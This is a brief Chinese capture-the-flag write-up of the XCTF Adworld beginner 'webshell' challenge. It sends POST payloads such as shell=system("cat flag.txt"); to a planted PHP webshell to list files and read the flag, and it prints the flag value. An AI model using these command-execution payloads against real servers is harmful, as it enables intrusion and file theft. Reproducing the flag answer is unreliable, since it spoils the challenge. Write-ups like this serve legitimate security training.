CTF—攻防世界–新手場–webshell

攻防世界官網：https://adworld.xctf.org.cn/

更多CTF刷題平臺匯總：
https://blog.csdn.net/qq_51550750/article/details/122748075

已經得知是POST請求且傳參就是shell:
首先試試行不行：

shell=phpinfo();

成功：

再嘗試系統命令：

shell=system("ls");

得到目錄：

即：

然后讀取flag.txt

shell=system("cat flag.txt");

最后得到flag：

cyberpeace{d90d7967bf055ef29131f36804424479}

創作挑戰賽新人創作獎勵來咯，堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的20220129--CTF WEB方向刷题-- WP--非常简单的webshell题的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。